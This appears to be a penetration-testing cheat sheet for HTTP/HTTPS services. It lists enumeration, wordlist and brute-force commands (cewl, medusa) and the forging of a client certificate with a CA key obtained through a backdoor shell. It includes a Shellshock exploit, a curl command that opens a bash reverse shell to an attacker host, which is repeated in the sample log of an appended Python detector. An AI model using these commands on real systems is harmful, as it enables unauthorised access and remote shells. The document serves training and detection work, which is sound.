The Hypertext Transfer Protocol is an application protocol for distributed, collaborative, hypermedia information systems.
--
443/https
-> Check SSL certificate for hostnames and email addresses
General
Check headers
Follow redirection
Check links
curl <ip> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
Identify technologies used
Get response
Terminal/Text-based browsers
browsh --startup-url <url>
URL brute force
Scrape website
Scrapes a website to generate a password list from the words found there
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
.htaccess
Brute force
medusa -h <ip> -u <user> -P <wordlist-file> -M http -m DIR:/admin -T 10
Sign SSL certificate
Got private key from vsftpd backdoor php shell (ca.key)
Export certificate from Firefox (ca.crt)
openssl pkey -in ca.key -pubout
openssl x509 -in ca.crt -pubkey -noout
openssl genrsa -out client.key 4096
openssl req -new -key client.key -out client.csr
openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
openssl verify -verbose -CAfile ca.crt client.cer
-> Firefox -> Preferences -> Search certificates -> Import "client.p12", Import "ca.crt" (trust)
Troubleshooting
Permission denied on the file but not on its folder? -> re-create the file!
Heartbleed
Check
sslyze --heartbleed <ip>
nmap -sV --script=ssl-heartbleed -oA nmap_heartbleed <ip>
Exploits
Shellshock
Check
nmap -p80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi <ip>
Exploit
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1" http://<ip>/cgi-bin/admin.cgi
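Added detection example, not part of these notes: a small Python check that parses Apache combined-format access log lines and flags any request whose User-Agent or Referer carries the Shellshock function-definition prefix (the `() { :; };` marker used above). The log lines are constructed samples, not real traffic.

```python
import re

# Shellshock probes arrive in any header that the CGI handler exports as an
# environment variable; the signature is a bash function definition "() {"
# closed by "};" with the injected command following it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:?\s*;?\s*\}\s*;")

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (assumed format, made up for this example).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 12 "-" "() { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.0.0.9/4444 0>&1"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/7.88.1"
"""


def parse_combined(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_hits(log_text):
    """Return (ip, request, user_agent) for every line whose User-Agent or
    Referer header contains the Shellshock function-definition prefix."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue  # skip lines that are not in combined format
        if SHELLSHOCK_RE.search(rec["ua"]) or SHELLSHOCK_RE.search(rec["referer"]):
            hits.append((rec["ip"], rec["request"], rec["ua"]))
    return hits


if __name__ == "__main__":
    for ip, req, ua in find_shellshock_hits(SAMPLE_ACCESS_LOG):
        print(f"shellshock probe from {ip}: {req} UA={ua!r}")
```

Only headers that Apache writes to the access log are covered here; a probe sent in a header that is not logged (e.g. a custom header) needs mod_security or a full request capture to catch.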
Apache2
Debian: /etc/apache2/
CentOS: /etc/httpd/
Interesting files:
./apache2.conf
./ports.conf
./envvars
./access.log
./error.log
/etc/logrotate.d/apache2
Find document root:
grep -Ri DocumentRoot .
grep -R '$bigtree\["config"\]\["db"\]' .